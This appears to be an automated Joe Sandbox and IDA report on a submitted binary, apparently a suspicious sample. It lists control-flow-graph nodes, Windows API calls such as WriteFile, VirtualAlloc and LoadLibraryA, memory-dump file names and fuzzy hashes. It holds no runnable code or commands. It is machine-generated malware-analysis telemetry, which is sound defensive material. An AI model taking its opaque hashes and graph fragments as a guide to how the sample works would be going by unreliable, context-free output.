                                                                                            control_flow_graph 342 407749-40774a 343 4076dc-4076e6 WriteFile 342->343 344 40774c-40776f 342->344 346 4076e8-4076ea call 40748c 343->346 347 4076ef-4076f2 343->347 345 407770-407785 344->345 348 407787 345->348 349 4077f9 345->349 346->347 351 407700-407704 347->351 352 4076f4-4076fb call 4073ec 347->352 353 40778a-40778f 348->353 354 4077fd-407802 348->354 355 40783b-40783d 349->355 356 4077fb 349->356 352->351 360 407803-407819 353->360 362 407791-407792 353->362 354->360 358 407841-407843 355->358 356->354 361 40785b-40785c 358->361 360->361 371 40781b 360->371 363 4078d6-4078eb call 407890 InterlockedExchange 361->363 364 40785e-40788c 361->364 365 407724-407741 362->365 366 407794-4077b4 362->366 386 407912-407917 363->386 387 4078ed-407910 363->387 380 407820-407823 364->380 381 407890-407893 364->381 369 4077b5 365->369 372 407743 365->372 366->369 374 4077b6-4077b7 369->374 375 4077f7-4077f8 369->375 377 40781e-40781f 371->377 378 407746-407747 372->378 379 4077b9 372->379 374->379 375->349 377->380 378->342 383 4077bb-4077cd 378->383 379->383 384 407824 380->384 385 407898 380->385 381->385 383->358 388 4077cf-4077d4 383->388 389 407825 384->389 390 40789a 384->390 385->390 387->386 387->387 388->355 395 4077d6-4077de 388->395 392 407896-407897 389->392 393 407826-40782d 389->393 394 40789f 390->394 392->385 396 4078a1 393->396 397 40782f 393->397 394->396 395->345 404 4077e0 395->404 399 4078a3 396->399 400 4078ac 396->400 401 407832-407833 397->401 402 4078a5-4078aa 397->402 399->402 405 4078ae-4078af 400->405 401->355 401->377 402->405 404->375 405->394 406 4078b1-4078bd 405->406 406->385 407 4078bf-4078c0 406->407
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                            • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                            • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                            • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 408 401fd4-401fe6 409 401fe8 call 401918 408->409 410 401ffb-402010 408->410 414 401fed-401fef 409->414 412 402012-402017 RtlEnterCriticalSection 410->412 413 40201c-402025 410->413 412->413 415 402027 413->415 416 40202c-402032 413->416 414->410 417 401ff1-401ff6 414->417 415->416 418 402038-40203c 416->418 419 4020cb-4020d1 416->419 420 40214f-402158 417->420 423 402041-402050 418->423 424 40203e 418->424 421 4020d3-4020e0 419->421 422 40211d-40211f call 401ee0 419->422 427 4020e2-4020ea 421->427 428 4020ef-40211b call 402f54 421->428 431 402124-40213b 422->431 423->419 425 402052-402060 423->425 424->423 429 402062-402066 425->429 430 40207c-402080 425->430 427->428 428->420 433 402068 429->433 434 40206b-40207a 429->434 436 402082 430->436 437 402085-4020a0 430->437 439 402147 431->439 440 40213d-402142 RtlLeaveCriticalSection 431->440 433->434 441 4020a2-4020c6 call 402f54 434->441 436->437 437->441 440->439 441->420
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                              • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                              • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                              • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                              • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                            • String ID:
                                                                                            • API String ID: 296031713-0
                                                                                            • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                            • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                            • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                            • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 444 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                            • String ID:
                                                                                            • API String ID: 2987862817-0
                                                                                            • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                            • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                            • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                            • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020803AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                            • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                            • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                            • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 448 40762c-40764a ReadFile 449 407663-40766a 448->449 450 40764c-407650 448->450 451 407652-40765a GetLastError 450->451 452 40765c-40765e call 40748c 450->452 451->449 451->452 452->449
                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastRead
                                                                                            • String ID:
                                                                                            • API String ID: 1948546556-0
                                                                                            • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                            • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                            • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                            • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020803AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                            • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                            • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                            • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree
                                                                                            • String ID:
                                                                                            • API String ID: 2087232378-0
                                                                                            • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                            • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                            • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                            • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                              • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                              • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1658689577-0
                                                                                            • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                            • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                            • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                            • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                            • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                            • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                            • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                            • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                            • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                            • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                            • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                            • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                            • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020803AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastWrite
                                                                                            • String ID:
                                                                                            • API String ID: 442123175-0
                                                                                            • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                            • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                            • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                            • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                            APIs
                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage
                                                                                            • String ID:
                                                                                            • API String ID: 1306739567-0
                                                                                            • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                            • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                            • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                            • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNEL32(?,02098000,0040AA59,00000000), ref: 004076B3
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020803AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 734332943-0
                                                                                            • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                            • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                            • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                            • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                            • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                            • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                            • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                            • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                            • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                            • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                            APIs
                                                                                            • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrev
                                                                                            • String ID:
                                                                                            • API String ID: 122130370-0
                                                                                            • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                            • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                            • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
